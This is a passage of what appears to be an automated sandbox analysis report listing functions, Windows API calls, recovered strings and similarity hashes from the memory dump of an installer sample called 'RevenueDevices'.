                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: Close$DeleteEnumOpen
                                        • String ID:
                                        • API String ID: 1912718029-0
                                        • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                        • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                        • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                        • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                        APIs
                                        • GetDlgItem.USER32(?), ref: 004020A3
                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                        • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                        • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                        • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                        APIs
                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                        • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                        • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                        • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                        APIs
                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                        Strings
                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                        • API String ID: 1697273262-1764544995
                                        • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                        • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                        • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                        • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00404902
                                        • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                          • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID: $@rD
                                        • API String ID: 3748168415-881980237
                                        • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                        • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                        • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                        • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                        APIs
                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                          • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                        • lstrlenW.KERNEL32 ref: 004026B4
                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                        • String ID: CopyFiles "%s"->"%s"
                                        • API String ID: 2577523808-3778932970
                                        • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                        • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                        • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                        • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: lstrcatwsprintf
                                        • String ID: %02x%c$...
                                        • API String ID: 3065427908-1057055748
                                        • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                        • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                        • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                        • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 00405057
                                          • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                        • String ID: Section: "%s"$Skipping section: "%s"
                                        • API String ID: 2266616436-4211696005
                                        • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                        • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                        • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                        • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                        APIs
                                        • GetDC.USER32(?), ref: 00402100
                                        • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                        • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                        • String ID:
                                        • API String ID: 1599320355-0
                                        • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                        • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                        • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                        • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                        APIs
                                          • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                        • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                        • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                        • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: lstrcpyn$CreateFilelstrcmp
                                        • String ID: Version
                                        • API String ID: 512980652-315105994
                                        • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                        • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                        • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                        • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                        • GetTickCount.KERNEL32 ref: 00403303
                                        • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                        • String ID:
                                        • API String ID: 2102729457-0
                                        • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                        • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                        • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                        • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                        • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                        • String ID:
                                        • API String ID: 2883127279-0
                                        • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                        • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                        • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                        • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                        APIs
                                        • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                        • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringlstrcmp
                                        • String ID: !N~
                                        • API String ID: 623250636-529124213
                                        • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                        • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                        • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                        • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                        APIs
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                        • CloseHandle.KERNEL32(?), ref: 00405C71
                                        Strings
                                        • Error launching installer, xrefs: 00405C48
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID: Error launching installer
                                        • API String ID: 3712363035-66219284
                                        • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                        • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                        • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                        • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                        APIs
                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                        • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: CloseHandlelstrlenwvsprintf
                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                        • API String ID: 3509786178-2769509956
                                        • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                        • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                        • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                        • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                        • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                        • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                        • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                        • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                        • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4